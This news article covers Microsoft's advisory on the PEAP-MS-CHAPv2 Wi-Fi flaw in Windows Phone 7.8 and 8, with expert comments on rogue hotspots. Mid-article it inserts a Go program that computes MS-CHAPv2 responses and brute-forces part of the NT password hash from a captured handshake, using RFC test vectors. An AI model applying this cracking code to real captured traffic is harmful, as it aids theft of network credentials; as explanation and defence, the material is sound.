The issue is that Microsoft committed one of the cardinal sins of security: it took a good idea (encryption), implemented it badly in the Windows Phone 7.8 and Windows Phone 8 operating systems, and then released it to the market, said Kevin O’Brien, an enterprise solution architect at CloudLock.
Microsoft is warning consumers whose smartphones run the Windows Phone 7.8 and Windows Phone 8 mobile operating systems that they could be open to attack.
Attackers could exploit a weakness in the Wi-Fi authentication method known as PEAP-MS-CHAPv2 (Protected Extensible Authentication Protocol with Microsoft Challenge Handshake Authentication Protocol version 2) to recover the user’s domain log-on credentials.
“In vulnerable scenarios, an attacker who successfully exploited this issue could achieve information disclosure against the targeted device,” the company said in a security advisory. “Microsoft is not currently aware of active attacks or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.”
Intercepting Encrypted Credentials
Here is how an attacker-controlled system could exploit the weakness. First, the system poses as a known Wi-Fi access point. The targeted device, recognizing the network name, automatically attempts to authenticate to it, which lets the attacker capture the victim’s encrypted domain credentials, that is, the MS-CHAPv2 challenge and response the phone sends during the handshake.
Next, the attacker applies the known cryptographic weaknesses of MS-CHAPv2 to that captured exchange and recovers the victim’s domain credentials offline. Finally, those credentials let the attacker authenticate to network resources and take any action the user could take on the network.
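To make the “cryptographic weakness” concrete, here is an added Go example (not code from Microsoft, the advisory, or the article) that implements the MS-CHAPv2 challenge-response computation from RFC 2759 and then shows what a rogue access point can do with a captured exchange. The 16-byte NT password hash is zero-padded to 21 bytes and split into three single-DES keys that each encrypt the same 8-byte challenge hash; the third key contains only two unknown bytes, so an attacker recovers those bytes with a 65,536-try brute force. The inputs are the RFC 2759 section 9.2 test vectors (user “User”, password “clientPass”) standing in for a captured handshake; the NT hash is taken from the same vector rather than computed, because Go’s standard library does not ship MD4.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
)

// Test vectors from RFC 2759 section 9.2 (user "User", password "clientPass").
// They stand in for a captured handshake; no real traffic is used here.
var (
	rfcUserName      = "User"
	rfcAuthChallenge = [16]byte{0x5B, 0x5D, 0x7C, 0x7D, 0x7B, 0x3F, 0x2F, 0x3E,
		0x3C, 0x2C, 0x60, 0x21, 0x32, 0x26, 0x26, 0x28}
	rfcPeerChallenge = [16]byte{0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2D,
		0x28, 0x29, 0x5F, 0x2B, 0x3A, 0x33, 0x7C, 0x7E}
	// NT hash = MD4(UTF-16LE("clientPass")), copied from the same RFC vector
	// because Go's standard library has no MD4 implementation.
	rfcNTHash = [16]byte{0x44, 0xEB, 0xBA, 0x8D, 0x53, 0x12, 0xB8, 0xD6,
		0x11, 0x47, 0x44, 0x11, 0xF5, 0x69, 0x89, 0xAE}
)

// challengeHash is ChallengeHash() from RFC 2759: the first 8 bytes of
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName).
func challengeHash(peer, auth [16]byte, user string) [8]byte {
	h := sha1.New()
	h.Write(peer[:])
	h.Write(auth[:])
	h.Write([]byte(user))
	var out [8]byte
	copy(out[:], h.Sum(nil)[:8])
	return out
}

// desKeyFrom7 spreads 56 key bits over 8 bytes, leaving the low bit of each
// byte for parity, as the RFC's DesEncrypt() does. DES ignores parity bits.
func desKeyFrom7(k7 []byte) []byte {
	k8 := make([]byte, 8)
	k8[0] = k7[0] >> 1
	k8[1] = (k7[0]&0x01)<<6 | k7[1]>>2
	k8[2] = (k7[1]&0x03)<<5 | k7[2]>>3
	k8[3] = (k7[2]&0x07)<<4 | k7[3]>>4
	k8[4] = (k7[3]&0x0F)<<3 | k7[4]>>5
	k8[5] = (k7[4]&0x1F)<<2 | k7[5]>>6
	k8[6] = (k7[5]&0x3F)<<1 | k7[6]>>7
	k8[7] = k7[6] & 0x7F
	for i := range k8 {
		k8[i] <<= 1
	}
	return k8
}

// desEncryptBlock encrypts one 8-byte block under a 7-byte key.
func desEncryptBlock(key7, block []byte) []byte {
	c, err := des.NewCipher(desKeyFrom7(key7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ntResponse is ChallengeResponse() from RFC 2759: the NT hash is zero-padded
// to 21 bytes and split into three 7-byte DES keys, each encrypting the same
// challenge hash. The third key is hash bytes 14-15 plus five zero bytes.
func ntResponse(ch [8]byte, ntHash [16]byte) [24]byte {
	var padded [21]byte
	copy(padded[:], ntHash[:])
	var resp [24]byte
	for i := 0; i < 3; i++ {
		copy(resp[i*8:], desEncryptBlock(padded[i*7:i*7+7], ch[:]))
	}
	return resp
}

// recoverHashTail is the attacker's side: given a captured challenge hash and
// NT-Response, brute-force the third DES block. Only 2^16 keys are possible,
// so NT hash bytes 14-15 fall out in a fraction of a second.
func recoverHashTail(ch [8]byte, resp [24]byte) (tail [2]byte, ok bool) {
	key := make([]byte, 7) // bytes 2..6 of the third key are always zero
	for k := 0; k < 1<<16; k++ {
		binary.BigEndian.PutUint16(key[:2], uint16(k))
		if bytes.Equal(desEncryptBlock(key, ch[:]), resp[16:24]) {
			copy(tail[:], key[:2])
			return tail, true
		}
	}
	return tail, false
}

func main() {
	ch := challengeHash(rfcPeerChallenge, rfcAuthChallenge, rfcUserName)
	resp := ntResponse(ch, rfcNTHash)
	fmt.Printf("challenge hash: %X\n", ch)
	fmt.Printf("NT-Response:    %X\n", resp)
	tail, ok := recoverHashTail(ch, resp)
	fmt.Printf("recovered NT hash bytes 14-15: %X (found=%v)\n", tail, ok)
}
```

With two bytes of the hash known, the remaining two DES keys share a single 2^56 search, which is what the chapcrack tooling presented in 2012 reduced the attack to, and the recovered NT hash is itself sufficient to authenticate because MS-CHAPv2 never needs the plaintext password. In PEAP this inner exchange is supposed to run inside a TLS tunnel to the RADIUS server, so a rogue access point only sees it when the client skips server-certificate validation; whether the Wi-Fi profile requires that validation is the first check to make on any device still using PEAP-MS-CHAPv2.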
We caught up with Kevin O’Brien, an enterprise solution architect at CloudLock, to get his take on the exploit. He told us the pivot point is the cryptographic weakness in the protocol.
“We’ve seen this particular type of vulnerability before, including from Microsoft, whose ASP.NET framework had a similar issue a few years ago,” O’Brien said. “We’ve seen it recently, in the now well-known Cryptocat exploit. And we’ll see it again.”
As O’Brien sees it, the issue is that Microsoft committed one of the cardinal sins of security: it took a good idea (encryption), implemented it badly and then released it to the market.
“What went wrong in the MS-CHAPv2 example here is that the protocol relies largely upon smoke and mirrors to appear confusing, either intentionally or due to a lack of understanding on the behalf of the original coders,” O’Brien said. “As a result, the entire protocol is compromised, and it should cease to be used in favor of the far more robust open-source alternatives in the market today.”
A Recipe for Mass Compromise
Mike Gross, global risk strategy director at 41st Parameter, told us the lesson is that most mobile devices, by default, reconnect automatically to known Wi-Fi and other networks, so users need to be aware of these settings and of how they can protect themselves.
“While there are specific steps that businesses can take to protect their secure networks from unauthorized access, users will unfortunately still be vulnerable to attack unless they disable the option to automatically connect to known Wi-Fi networks — something most consumers will not do because of the inconvenience involved in reconnecting every time they come home or walk into an airport,” he said.
In many cases, Gross noted, a smartphone or tablet user may simply be strolling through his local airport where an attacker has set up a Wi-Fi hotspot mimicking the legitimate public Wi-Fi, using the airport code as the network name and requiring no password to connect. He called this scenario a recipe for mass compromise, as mobile devices would likely connect to the known network name without hesitation.
“Even if the Wi-Fi auto-join feature is disabled, consumers are not in the clear. They will likely still be prompted to connect to a Wi-Fi network and should be extra vigilant when traveling or in a public location where this type of network spoofing is possible,” Gross said. “Smartphone software configurations and defaults are clearly set up with user convenience in mind, so consumers must take extra steps to protect themselves and the integrity of their mobile devices.”